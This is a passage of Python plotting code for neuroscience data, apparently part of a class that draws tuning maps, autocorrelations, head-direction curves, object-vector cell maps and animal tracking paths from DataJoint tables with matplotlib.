    # Prepare list of attributes to check:
    # (copy so the class-level constant is not mutated)
    ATTR_TUNINGMAP = self.ATTR_TUNINGMAP.copy()
    # Display session hash or animal_name/timestamp?
    if hash_or_animal == 'hash':
        ATTR_TUNINGMAP.append(self.RECORDING_HASH)
    elif hash_or_animal == 'animal':
        ATTR_TUNINGMAP.append(self.ANIMAL_NAME)
        ATTR_TUNINGMAP.append(self.TIMESTAMP)
    else:
        raise NameError(f'Keyword "{hash_or_animal}" not recognized')
    # Display a score?
    if display_score is not None and isinstance(display_score, str):
        ATTR_TUNINGMAP.append(display_score)
    else:
        display_score = None
    # Check attributes in datajoint join
    if not self.__check_join_integrity(ATTR_TUNINGMAP):
        raise KeyError('One or more of these were not found: {}'.format(ATTR_TUNINGMAP))
    ###########################################################################
    ############### START PLOTTING FUNCTIONS
    plot_counter = 0
    # Iterate either over explicit keys (fetching each entry) or directly
    # over the datajoint object.
    if self.keys is not None:
        iterator = self.keys
        use_keys = True
    else:
        iterator = self.dj_object
        use_keys = False
    if self.total is not None:
        total = self.total
    else:
        total = len(iterator)
    # An externally supplied axis only makes sense for a single plot.
    if (ax is not None) and (total > 1):
        raise NotImplementedError(f'Axis was given, and total number of plots = {total}.\
            \nMake sure you have only one element to plot!')
    elif ax is not None:
        external_axis = True
    elif ax is None:
        external_axis = False
    # Cue card positions
    if cue_card_pos is not None:
        if isinstance(cue_card_pos, str):
            # Single string: same card position for every plot.
            cue_card_pos = [cue_card_pos] * total
        else:
            assert len(cue_card_pos) == total, \
                'Length of cue card position array does not match length of cells to plot'
    # Make loop with tqdm progress bar
    tqdm_iterator = self.__tqdm_iterator(iterator, total-1, 'Drawing tuningmaps')
    if not external_axis:
        # Property access creates a fresh 5x5-grid figure.
        figure = self.__create_figure_grid
    for no, key in tqdm_iterator:
        # Reached the requested total: save/show whatever is drawn so far,
        # then stop.
        if no == total:
            if (plot_counter > 0) and not external_axis:
                if self.save_path is not None:
                    print('Saving figure under {}'.format(str(self.save_path)))
                    if plot_counter < 2:
                        # Show the actual cell ids in export path
                        export_name = f'tuningmaps {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
                    else:
                        export_name = f'tuningmaps n={plot_counter}.{self.save_format}'
                    figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
                else:
                    plt.show()
            # Premature stop? Make sure you close things gracefully:
            tqdm_iterator.refresh()
            tqdm._instances.clear()
            break
        # Use keys or join object?
        if use_keys:
            entry = (self.dj_object & key).fetch1()
        else:
            entry = key
        # Apply the mask, then fill masked bins with 0 for display.
        tuningmap = np.ma.masked_array(entry['tuningmap'], mask=entry['mask_tm'])
        tuningmap = tuningmap.filled(fill_value=0)
        # Get subplot title
        plot_counter += 1
        if not external_axis:
            ax = figure.add_subplot(5,5,plot_counter)
        # Check for custom styling
        if self.style in styles:
            cc_color = styles[self.style].get('cue_card_color_tuningmap', CUE_CARD_COLOR_TM)
            axes_color = styles[self.style].get('axes_color_tuningmap', AXES_COLOR_TM)
        else:
            cc_color = CUE_CARD_COLOR_TM
            axes_color = AXES_COLOR_TM
        # Clip display range at the 99th percentile to suppress outliers.
        ax.imshow(tuningmap, cmap=cmap, vmin=np.nanmin(tuningmap), vmax=np.nanpercentile(tuningmap,99))
        ax.set_aspect('equal')
        ax.get_xaxis().set_ticks([]);ax.get_yaxis().set_ticks([])
        if display_title:
            title = self.__title(entry, display_score, hash_or_animal)
            ax.set_title(title)
        for axis in ['top','bottom','left','right']:
            ax.spines[axis].set_linewidth(axes_lw)
            ax.spines[axis].set_color(axes_color)
        # Draw cue card?
        if cue_card_pos is not None:
            size = tuningmap.shape
            card_pos = cue_card_pos[no]
            # Draw a short, thick line segment on the chosen border.
            if card_pos == 'west':
                ax.plot([0.,0.],[size[0]/2-5,size[0]/2+5], lw=5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
            elif card_pos == 'east':
                ax.plot([size[1]-1,size[1]-1],[size[0]/2-5,size[0]/2+5], lw=5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
            elif card_pos == 'north':
                ax.plot([size[1]/2-5,size[1]/2+5],[0,0], lw=5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
            elif card_pos == 'south':
                ax.plot([size[1]/2-5,size[1]/2+5],[size[0]-1,size[0]-1], lw=5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
            else:
                raise NotImplementedError(f'Card position {card_pos} not understood. Choose ["west", "east", "north", "south"]')
        # Page full (default 25 subplots): save/show and start a new figure.
        if plot_counter >= self.plots_per_view:
            if (self.save_path is not None) and not external_axis:
                print('Saving figure under {}'.format(str(self.save_path)))
                if plot_counter < 2:
                    # Show the actual cell ids in export path
                    export_name = f'tuningmaps {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
                else:
                    export_name = f'tuningmaps n={plot_counter}.{self.save_format}'
                figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
            else:
                plt.show()
            plot_counter = 0
            # Create next figure
            if not external_axis:
                figure = self.__create_figure_grid
    return
def autocorr(self, **kwargs):
'''
Plot autocorrelations in 5x5 grid
Optionally shows score for every subplot if available.
Parameters
----------
**kwargs:
cmap : string
Valid matplotlib colormap string
https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
or https://github.com/1313e/CMasher
hash_or_animal: string
'hash' or 'animal'
Determines whether session name (hash) or animal/timestamp
combination should be displayed in title of each subplot.
Defaults to 'animal'
display_score : string
Name of the score (=column name) to display in title
of each subplot.
Defaults to None.
axes_lw : float
axes linewidth. Default 5.
display_title : bool
Show title?
ax : axis
Matplotlib axis to draw into
'''
# Process kwargs
cmap = kwargs.get('cmap', 'magma')
cmap = plt.get_cmap(cmap)
display_score = kwargs.get('display_score', None)
hash_or_animal = kwargs.get('hash_or_animal', 'animal')
axes_lw = kwargs.get('axes_lw', 5.)
display_title = kwargs.get('display_title', True)
ax = kwargs.get('ax', None)
# Prepare list of attributes to check:
ATTR_AUTOCORR = self.ATTR_AUTOCORR.copy()
# Display session hash or animal_name/timestamp?
if hash_or_animal == 'hash':
ATTR_AUTOCORR.append(self.RECORDING_HASH)
elif hash_or_animal == 'animal':
ATTR_AUTOCORR.append(self.ANIMAL_NAME)
ATTR_AUTOCORR.append(self.TIMESTAMP)
else:
raise NameError(f'Keyword "{hash_or_animal}" not recognized')
# Display a score?
if display_score is not None and isinstance(display_score, str):
ATTR_AUTOCORR.append(display_score)
else:
display_score = None
# Check attributes in datajoint join
if not self.__check_join_integrity(ATTR_AUTOCORR):
raise KeyError('One or more of these were not found: {}'.format(ATTR_AUTOCORR))
###########################################################################
############### START PLOTTING FUNCTIONS
plot_counter = 0
if self.keys is not None:
iterator = self.keys
use_keys = True
else:
iterator = self.dj_object
use_keys = False
if self.total is not None:
total = self.total
else:
total = len(iterator)
if (ax is not None) and (total > 1):
raise NotImplementedError(f'Axis was given, and total number of plots = {total}.\
\nMake sure you have only one element to plot!')
elif ax is not None:
external_axis = True
elif ax is None:
external_axis = False
# Make loop with tqdm progress bar
tqdm_iterator = self.__tqdm_iterator(iterator, total-1, 'Drawing autocorrelations')
if not external_axis:
figure = self.__create_figure_grid
for no, key in tqdm_iterator:
if no == total:
if (plot_counter > 0) and not external_axis:
if self.save_path is not None:
print('Saving figure under {}'.format(str(self.save_path)))
if plot_counter < 2:
# Show the actual cell ids in export path
export_name = f'autocorr {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
else:
export_name = f'autocorr n={plot_counter}.{self.save_format}'
figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
else:
plt.show()
# Premature stop? Make sure you close things gracefully:
tqdm_iterator.refresh()
tqdm._instances.clear()
break
# Use keys or join object?
if use_keys:
entry = (self.dj_object & key).fetch1()
else:
entry = key
# Check for custom styling
if self.style in styles:
axes_color = styles[self.style].get('axes_color_autocorr', AXES_COLOR_ACORR)
else:
axes_color = AXES_COLOR_ACORR
plot_counter += 1
if not external_axis:
ax = figure.add_subplot(5,5,plot_counter)
ax.imshow(entry['acorr'], cmap=cmap)
ax.set_aspect('equal')
ax.get_xaxis().set_ticks([]);ax.get_yaxis().set_ticks([])
if display_title:
title = self.__title(entry, display_score, hash_or_animal)
ax.set_title(title)
for axis in ['top','bottom','left','right']:
ax.spines[axis].set_linewidth(axes_lw)
ax.spines[axis].set_color(AXES_COLOR_ACORR)
if plot_counter >= self.plots_per_view:
if (self.save_path is not None) and not external_axis:
print('Saving figure under {}'.format(str(self.save_path)))
if plot_counter < 2:
# Show the actual cell ids in export path
export_name = f'autocorr {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
else:
export_name = f'autocorr n={plot_counter}.{self.save_format}'
figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
else:
plt.show()
plot_counter = 0
# Create next figure
if not external_axis:
figure = self.__create_figure_grid
return
    def hdtuning(self, **kwargs):
        '''
        Plot HD tuning curves and occupancy
        Optionally shows score for every subplot if available.
        Parameters
        ----------
        **kwargs:
            hash_or_animal: string
                'hash' or 'animal'
                Determines whether session name (hash) or animal/timestamp
                combination should be displayed in title of each subplot.
                Defaults to 'animal'
            display_score : string
                Name of the score (=column name) to display in title
                of each subplot.
                Defaults to None.
            color_hd : Show colored line for hd tuning curve according to average angle?
            cmap : string
                (for 'color_hd') : Valid matplotlib colormap string
                https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
                or https://github.com/1313e/CMasher
            line_width : float
                Line width of tuning curve
            only_occupancy: bool
                If True draws only occupancy, not actual tuning of cell
            display_title : bool
                Show title?
            ax : axis
                Matplotlib axis to draw into
        '''
        # Process kwargs
        display_score = kwargs.get('display_score', None)
        hash_or_animal = kwargs.get('hash_or_animal', 'animal')
        color_hd = kwargs.get('color_hd', False)
        cmap = kwargs.get('cmap', sns.husl_palette(as_cmap=True))
        only_occupancy = kwargs.get('only_occupancy', False)
        display_title = kwargs.get('display_title', True)
        line_width = kwargs.get('line_width', 3.)
        ax = kwargs.get('ax', None)
        # Prepare list of attributes to check:
        ATTR_HDTUNING = self.ATTR_HDTUNING.copy()
        # Display session hash or animal_name/timestamp?
        if hash_or_animal == 'hash':
            ATTR_HDTUNING.append(self.RECORDING_HASH)
        elif hash_or_animal == 'animal':
            ATTR_HDTUNING.append(self.ANIMAL_NAME)
            ATTR_HDTUNING.append(self.TIMESTAMP)
        else:
            raise NameError(f'Keyword "{hash_or_animal}" not recognized')
        # Display a score?
        if display_score is not None and isinstance(display_score, str):
            ATTR_HDTUNING.append(display_score)
        else:
            display_score = None
        if only_occupancy:
            # Occupancy-only mode: drop the tuning attribute from the
            # integrity check. NOTE(review): 'angular_tuning' is still read
            # from the fetched entry further below (before the drawn line is
            # deleted) - presumably fetch1() always returns it; confirm.
            ATTR_HDTUNING.remove('angular_tuning')
        if color_hd:
            # Coloring by mean angle requires the 'angular_mean' attribute.
            ATTR_HDTUNING.append('angular_mean')
        # Check attributes in datajoint join
        if not self.__check_join_integrity(ATTR_HDTUNING):
            raise KeyError('One or more of these were not found: {}'.format(ATTR_HDTUNING))
        ###########################################################################
        ############### START PLOTTING FUNCTIONS
        plot_counter = 0
        # Iterate over explicit keys if given, otherwise over the join itself.
        if self.keys is not None:
            iterator = self.keys
            use_keys = True
        else:
            iterator = self.dj_object
            use_keys = False
        if self.total is not None:
            total = self.total
        else:
            total = len(iterator)
        # An externally supplied axis only makes sense for a single plot.
        if (ax is not None) and (total > 1):
            raise NotImplementedError(f'Axis was given, and total number of plots = {total}.\
            \nMake sure you have only one element to plot!')
        elif ax is not None:
            external_axis = True
        elif ax is None:
            external_axis = False
        # Make loop with tqdm progress bar
        tqdm_iterator = self.__tqdm_iterator(iterator, total-1, 'Drawing HD tuning')
        if not external_axis:
            figure = self.__create_figure_grid
        for no, key in tqdm_iterator:
            if no == total:
                # Requested number of plots reached: flush partially filled
                # figure (save or show) and stop the iterator cleanly.
                if (plot_counter > 0) and not external_axis:
                    if self.save_path is not None:
                        print('Saving figure under {}'.format(str(self.save_path)))
                        if plot_counter < 2:
                            # Show the actual cell ids in export path
                            export_name = f'hdtuning {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
                        else:
                            export_name = f'hdtuning n={plot_counter}.{self.save_format}'
                        figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
                    else:
                        plt.show()
                # Premature stop? Make sure you close things gracefully:
                tqdm_iterator.refresh()
                tqdm._instances.clear()
                break
            # Use keys or join object?
            if use_keys:
                entry = (self.dj_object & key).fetch1()
            else:
                entry = key
            plot_counter +=1
            if not external_axis:
                ax = figure.add_subplot(5,5,plot_counter, projection='polar')
            else:
                # A polar axis exposes 'theta_direction' in its properties.
                assert 'theta_direction' in ax.properties(), 'Given axis is not polar. Make sure you initialize with "projection=polar"'
            # Check for custom styling
            if self.style in styles:
                color_line_hd = styles[self.style].get('color_line_hd', COLOR_LINE_HD)
                color_line_hd_occ = styles[self.style].get('color_line_hd_occ', COLOR_LINE_HD_OCC)
            else:
                color_line_hd = COLOR_LINE_HD
                color_line_hd_occ = COLOR_LINE_HD_OCC
            # Color?
            # This partially overwrites the stylesheet selection above
            if color_hd:
                color_line_hd = make_circular_colormap(np.array([entry['angular_mean']]), cmap=cmap)[0]
                line_width_ = line_width * 1.5 # Otherwise difficult to see the color
            else:
                line_width_ = line_width
            # Occupancy curve, normalized to its own maximum; drawn faint
            # unless it is the only curve shown.
            ax.plot(entry['angle_centers'],
                    entry['angular_occupancy']/np.nanmax(entry['angular_occupancy']),
                    color=color_line_hd_occ,
                    alpha=[1. if only_occupancy else .4][0],
                    lw=line_width_)
            # Tuning curve, normalized to its own maximum.
            ax.plot(entry['angle_centers'],
                    entry['angular_tuning']/np.nanmax(entry['angular_tuning']),
                    color=color_line_hd,
                    lw=line_width_,
                    alpha=.85)
            if only_occupancy:
                del ax.lines[1] # Get rid of second drawn line, i.e. the actual tuning curve. This keeps the y axis scaling intact.
            ax.set_aspect('equal')
            ax.set_theta_zero_location("S")
            ax.get_yaxis().set_ticks([])
            ax.tick_params(labelbottom=False)
            ax.spines['polar'].set_visible(False)
            if display_title:
                # Get subplot title
                title = self.__title(entry, display_score, hash_or_animal)
                ax.set_title(title, y=1.1)
            if plot_counter >= self.plots_per_view:
                # Grid is full: save or show, then start a fresh figure.
                if (self.save_path is not None) and not external_axis:
                    print('Saving figure under {}'.format(str(self.save_path)))
                    if plot_counter < 2:
                        # Show the actual cell ids in export path
                        export_name = f'hdtuning {key["recording_name"]} cell {key["cell_id"]}.{self.save_format}'
                    else:
                        export_name = f'hdtuning n={plot_counter}.{self.save_format}'
                    figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
                else:
                    plt.show()
                plot_counter = 0
                # Create next figure
                if not external_axis:
                    figure = self.__create_figure_grid
        return
###########################################################################
    def tuningmaps_ov(self, **kwargs):
        '''
        SPECIAL!
        - This function gets data for each session
        Plot tuningmaps for object vector (ov) cells (1x3):
        - base_session
        - object1_session
        - object2_session
        Optionally shows score if available.
        Parameters
        ----------
        **kwargs:
            cmap : string
                Valid matplotlib colormap string
                https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
                or https://github.com/1313e/CMasher
            hash_or_animal: string
                'hash' or 'animal'
                Determines whether session name (hash) or animal/timestamp
                combination should be displayed in title of each subplot.
                Defaults to 'animal'
            display_score : string
                Name of the score (=column name) to display in title
                of each subplot.
                Defaults to None.
            axes_lw : float
                axes linewidth. Default 5.
            normalize_base : bool
                If True (default), all session maps share one color scale
                (0 .. max over the session tuningmaps) and only the last
                colorbar is kept.
            display_title : bool
                Show title?
            cue_card_pos : list or string
                Cue card position in (tracked) field ['north','south','west','east']
            hide_cbar_axis: boolean
                Hide the colorbar axis label(s)?
        '''
        # Process kwargs
        cmap = kwargs.get('cmap', 'magma')
        cmap = plt.get_cmap(cmap)
        display_score = kwargs.get('display_score', None)
        hash_or_animal = kwargs.get('hash_or_animal', 'animal')
        axes_lw = kwargs.get('axes_lw', 5.)
        normalize_base = kwargs.get('normalize_base', True)
        display_title = kwargs.get('display_title', True)
        cue_card_pos = kwargs.get('cue_card_pos', None)
        hide_cbar_axis = kwargs.get('hide_cbar_axis', False)
        # Prepare list of attributes to check:
        ATTR_TUNINGMAP_OV = self.ATTR_TUNINGMAP_OV.copy()
        # Display session hash or animal_name/timestamp?
        if hash_or_animal == 'hash':
            ATTR_TUNINGMAP_OV.append(self.RECORDING_HASH_OV)
        elif hash_or_animal == 'animal':
            ATTR_TUNINGMAP_OV.append(self.ANIMAL_NAME)
            ATTR_TUNINGMAP_OV.append(self.TIMESTAMP)
        else:
            raise NameError(f'Keyword "{hash_or_animal}" not recognized')
        # Display a score?
        if display_score is not None and isinstance(display_score, str):
            ATTR_TUNINGMAP_OV.append(display_score)
        else:
            display_score = None
        # Check attributes in datajoint join
        if not self.__check_join_integrity(ATTR_TUNINGMAP_OV):
            raise KeyError('One or more of these were not found: {}'.format(ATTR_TUNINGMAP_OV))
        ###########################################################################
        ############### START PLOTTING FUNCTIONS
        # Iterate over explicit keys if given, otherwise over the join itself.
        if self.keys is not None:
            iterator = self.keys
            use_keys = True
        else:
            iterator = self.dj_object
            use_keys = False
        if self.total is not None:
            total = self.total
        else:
            total = len(iterator)
        # Cue card positions
        # A single string is broadcast to all cells; otherwise one position
        # per cell is required.
        if cue_card_pos is not None:
            if isinstance(cue_card_pos, str):
                cue_card_pos = [cue_card_pos] * total
            else:
                assert len(cue_card_pos) == total, \
                    'Length of cue card position array does not match length of cells to plot'
        # Make loop with tqdm progress bar
        tqdm_iterator = self.__tqdm_iterator(iterator, total-1, 'Drawing tuningmaps')
        for no, key in tqdm_iterator:
            if no == total:
                # Premature stop? Make sure you close things gracefully:
                tqdm_iterator.refresh()
                tqdm._instances.clear()
                plt.close()
                break
            # Use keys or join object?
            if use_keys:
                entry = (self.dj_object & key).fetch1()
            else:
                entry = key
            # Get session dictionary object vector
            recording_dict = make_multi_recording_object_dict(entry)
            recording_dict, max_rm = _get_ovc_tuningmaps(recording_dict, entry) # Returns tuningmaps and object positions and max over tuningmaps
            if recording_dict['object1']['recording_name'] == recording_dict['object2']['recording_name']:
                two_object_sess = True # This is a "special case" -> 2 objects in one session
                figure = self.__create_figure_grid_ov_2
                ax_base = figure.add_subplot(1,2,1)
                ax_object1 = figure.add_subplot(1,2,2)
            else:
                # 2 separate object sessions
                two_object_sess = False
                figure = self.__create_figure_grid_ov_3
                ax_base = figure.add_subplot(1,3,1)
                ax_object1 = figure.add_subplot(1,3,2)
                ax_object2 = figure.add_subplot(1,3,3)
            # Fill axes
            if normalize_base:
                rm1 = ax_base.imshow(recording_dict['base']['tuningmap'], vmin=0, vmax=max_rm, cmap=cmap) # Normalized view
                rm2 = ax_object1.imshow(recording_dict['object1']['tuningmap'], vmin=0, vmax=max_rm, cmap=cmap)
                if not two_object_sess:
                    rm3 = ax_object2.imshow(recording_dict['object2']['tuningmap'], vmin=0, vmax=max_rm, cmap=cmap)
            else:
                rm1 = ax_base.imshow(recording_dict['base']['tuningmap'], cmap=cmap)
                rm2 = ax_object1.imshow(recording_dict['object1']['tuningmap'], cmap=cmap)
                if not two_object_sess:
                    rm3 = ax_object2.imshow(recording_dict['object2']['tuningmap'], cmap=cmap)
            # Draw objects
            # Layered markers (large black square, light square, white square,
            # black cross) render an object symbol at the object position.
            ax_object1.scatter(recording_dict['object1']['object_x_rm'], recording_dict['object1']['object_y_rm'], marker='s', s=800, color='k')
            ax_object1.scatter(recording_dict['object1']['object_x_rm'], recording_dict['object1']['object_y_rm'], marker='s', s=500, color='#ccc')
            ax_object1.scatter(recording_dict['object1']['object_x_rm'], recording_dict['object1']['object_y_rm'], marker='s', s=300, color='w')
            ax_object1.scatter(recording_dict['object1']['object_x_rm'], recording_dict['object1']['object_y_rm'], marker='x', s=100, color='k')
            if not two_object_sess:
                ax_object2.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='s', s=800, color='k')
                ax_object2.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='s', s=500, color='#ccc')
                ax_object2.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='s', s=300, color='w')
                ax_object2.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='x', s=100, color='k')
            else:
                # Draw second object into object 1 session axis
                ax_object1.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='s', s=800, color='k')
                ax_object1.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='s', s=500, color='#ccc')
                ax_object1.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='s', s=300, color='w')
                ax_object1.scatter(recording_dict['object2']['object_x_rm'], recording_dict['object2']['object_y_rm'], marker='x', s=100, color='k')
            ax_base.set_aspect('equal')
            ax_base.get_xaxis().set_ticks([]); ax_base.get_yaxis().set_ticks([])
            ax_object1.set_aspect('equal')
            ax_object1.get_xaxis().set_ticks([]); ax_object1.get_yaxis().set_ticks([])
            if not two_object_sess:
                ax_object2.set_aspect('equal')
                ax_object2.get_xaxis().set_ticks([]); ax_object2.get_yaxis().set_ticks([])
            # Check for custom styling
            if self.style in styles:
                cc_color = styles[self.style].get('cue_card_color_tuningmap', CUE_CARD_COLOR_TM)
                axes_color = styles[self.style].get('axes_color_tuningmap', AXES_COLOR_TM)
            else:
                cc_color = CUE_CARD_COLOR_TM
                axes_color = AXES_COLOR_TM
            # Axes linewidth
            for axis in ['top','bottom','left','right']:
                ax_base.spines[axis].set_linewidth(axes_lw)
                ax_object1.spines[axis].set_linewidth(axes_lw)
                ax_object1.spines[axis].set_color(axes_color)
                if not two_object_sess:
                    ax_object2.spines[axis].set_linewidth(axes_lw)
                    ax_object2.spines[axis].set_color(axes_color)
            # Draw cue card?
            # The card is drawn as a short thick line segment on the map edge.
            if cue_card_pos is not None:
                size = recording_dict['base']['tuningmap'].shape # Just take one of them for now - should be fine
                card_pos = cue_card_pos[no]
                if card_pos == 'west':
                    ax_base.plot([0.,0.],[size[0]/2-5,size[0]/2+5], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
                    ax_object1.plot([0.,0.],[size[0]/2-5,size[0]/2+5], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
                    if not two_object_sess:
                        ax_object2.plot([0.,0.],[size[0]/2-5,size[0]/2+5], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
                elif card_pos == 'east':
                    ax_base.plot([size[1]-1,size[1]-1],[size[0]/2-5,size[0]/2+5], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
                    ax_object1.plot([size[1]-1,size[1]-1],[size[0]/2-5,size[0]/2+5], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
                    if not two_object_sess:
                        ax_object2.plot([size[1]-1,size[1]-1],[size[0]/2-5,size[0]/2+5], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
                elif card_pos == 'north':
                    ax_base.plot([size[1]/2-5,size[1]/2+5],[0,0], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
                    ax_object1.plot([size[1]/2-5,size[1]/2+5],[0,0], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
                    if not two_object_sess:
                        ax_object2.plot([size[1]/2-5,size[1]/2+5],[0,0], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
                elif card_pos == 'south':
                    ax_base.plot([size[1]/2-5,size[1]/2+5],[size[0]-1,size[0]-1], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
                    ax_object1.plot([size[1]/2-5,size[1]/2+5],[size[0]-1,size[0]-1], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
                    if not two_object_sess:
                        ax_object2.plot([size[1]/2-5,size[1]/2+5],[size[0]-1,size[0]-1], lw=3.5, color=cc_color, clip_on=False, zorder=10, solid_capstyle='butt')
                else:
                    raise NotImplementedError(f'Card position {card_pos} not understood. Choose ["west","east","north","south"]')
            # Create colorbars
            #plt.colorbar(rm1, ax=ax_base, fraction=0.03)
            if not two_object_sess:
                cbar_axes = [ax_base, ax_object1, ax_object2]
                rms = [rm1, rm2, rm3]
            else:
                cbar_axes = [ax_base, ax_object1]
                rms = [rm1, rm2]
            last_rm = rms[-1]
            for ax_, rm_ in zip(cbar_axes,rms):
                divider = make_axes_locatable(ax_)
                cax = divider.append_axes("right", size="6%", pad=0.11)
                cbar = plt.colorbar(rm_, cax=cax)
                cbar.outline.set_visible(False)
                if hide_cbar_axis:
                    #cbar.ax.set_ticks()
                    cbar.ax.set_yticklabels([])
                else:
                    cbar.ax.tick_params(labelsize=18)
                # With a shared color scale only the last colorbar is kept;
                # the others are redundant and removed.
                if normalize_base and (rm_ != last_rm):
                    cbar.remove()
            # Add title
            if display_title:
                # Get subplot title
                title = self.__title(entry, display_score, hash_or_animal, ov=True)
                ax_base.set_title(title)
            plt.subplots_adjust(wspace=.1)
            if self.save_path is not None:
                print('Saving figure under {}'.format(str(self.save_path)))
                export_name = f'tuningmaps ov {key["base_session"]} cell {key["cell_id"]}.{self.save_format}'
                figure.savefig(self.save_path / export_name, dpi=300, bbox_inches='tight')
            else:
                plt.show()
        return
def tracking(self, **kwargs):
'''
Plot tracking plots in 5x5 grid
Optionally shows score for every subplot if available.
! This uses self.path_event(draw_events=False) to generate plots.
Parameters
----------
**kwargs:
cmap : string
Valid matplotlib colormap string
https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
or https://github.com/1313e/CMasher
hash_or_animal: string
'hash' or 'animal'
Determines whether session name (hash) or animal/timestamp
combination should be displayed in title of each subplot.
Defaults to 'animal'
display_score : string
Name of the score (=column name) to display in title
of each subplot.
Defaults to None.
draw_speed : bool
Encode speed in size of dots in plot?
path_dot_size : int (float)
If draw_speed==False: Dot size for tracking
draw_angle : bool
Encode angle in color of dots in plot?
speed_scaler : float
How much smaller than actual speed should dot size be?
alpha_path : float
Transparency of lines
display_title : bool
Show title?
ax : axis
Matplotlib axis to draw into
'''
# Process kwargs
cmap = kwargs.get('cmap', sns.husl_palette(as_cmap=True))
cmap = plt.get_cmap(cmap)
display_score = kwargs.get('display_score', None)
hash_or_animal = kwargs.get('hash_or_animal', 'animal')
draw_speed = kwargs.get('draw_speed', False)
path_dot_size = kwargs.get('path_dot_size', 1.2)
draw_angle = kwargs.get('draw_angle', False)
speed_scaler = kwargs.get('speed_scaler', .5)
alpha_path = kwargs.get('alpha_path', 1)
display_title = kwargs.get('display_title', True)
ax = kwargs.get('ax', None)
self.path_event(draw_events=False, cmap=cmap, \
display_score=display_score, hash_or_animal=hash_or_animal,
draw_speed=draw_speed, path_dot_size=path_dot_size,
draw_angle=draw_angle, speed_scaler=speed_scaler, alpha_path=alpha_path,
display_title=display_title, ax=ax)
return
    def path_event(self, **kwargs):
        '''
        Plot path-event plots in 5x5 grid
        Optionally shows score for every subplot if available.
        ! This is used also as plotting container function for self.tracking().
        Parameters
        ----------
        **kwargs:
            cmap : string
                Valid matplotlib colormap string
                https://matplotlib.org/3.2.1/tutorials/colors/colormaps.html
                or https://github.com/1313e/CMasher
            hash_or_animal: string
                'hash' or 'animal'
                Determines whether session name (hash) or animal/timestamp
                combination should be displayed in title of each subplot.
                Defaults to 'animal'
            display_score : string
                Name of the score (=column name) to display in title
                of each subplot.
                Defaults to None.
            draw_events : bool
                Show events?
            draw_speed : bool
                Encode speed in size of dots in path plot?
            draw_angle : bool
                Encode angle in color of dots in plot?
            draw_time : bool
                Encode time since session start in color of dots?
            path_dot_size : int (float)
                If draw_speed==False: Dot size for tracking
            draw_hd : bool
                Encode angle in color of dots in plot?
                If draw_events==False this will color the path plot
                If draw_events==True this will color the events
            speed_scaler : float
                How much smaller than actual speed should dot size be?
            event_scaler : float
                How much smaller than actual event size should the dot be?
            event_color : list/string
                Valid color for events; defaults to 'k'
            alpha_path : float
            alpha_events : float
            display_title : bool
                Show title?
            ax : axis
                Matplotlib axis to draw into
        '''
        # Process kwargs
        cmap = kwargs.get('cmap', sns.husl_palette(as_cmap=True))
        display_score = kwargs.get('display_score', None)
        hash_or_animal = kwargs.get('hash_or_animal', 'animal')
        draw_events = kwargs.get('draw_events',True)
        draw_speed = kwargs.get('draw_speed', False)
        draw_angle = kwargs.get('draw_angle', False)
        draw_time = kwargs.get('draw_time', False)
        path_dot_size = kwargs.get('path_dot_size', 1.2)
        draw_hd = kwargs.get('draw_hd', False)
        speed_scaler = kwargs.get('speed_scaler', .5)
        event_scaler = kwargs.get('event_scaler', 80)
        event_color = kwargs.get('event_color', EVENT)
        alpha_path = kwargs.get('alpha_path', 1)
        alpha_events = kwargs.get('alpha_events', .7)
        display_title = kwargs.get('display_title', True)
        ax = kwargs.get('ax', None)
        # Prepare colormap (cmap)
        # for feeding make_circular_colormap or make_linear_colormap below
        # seaborn accepts palette names / color lists; a matplotlib Colormap
        # object raises TypeError there, so fall back to its .colors list.
        try:
            cmap = list(sns.color_palette(cmap, 256))
        except TypeError:
            cmap = plt.get_cmap(cmap).colors
        # Prepare list of attributes to check:
        if draw_events:
            ATTR_PATHEVENT = self.ATTR_PATHEVENT.copy()
        else:
            # If no events should be shown, use a short TRACKING attributes list
            ATTR_PATHEVENT = self.ATTR_TRACKING.copy()
        # Display session hash or animal_name/timestamp?
        if hash_or_animal == 'hash':
            ATTR_PATHEVENT.append(self.RECORDING_HASH)
        elif hash_or_animal == 'animal':
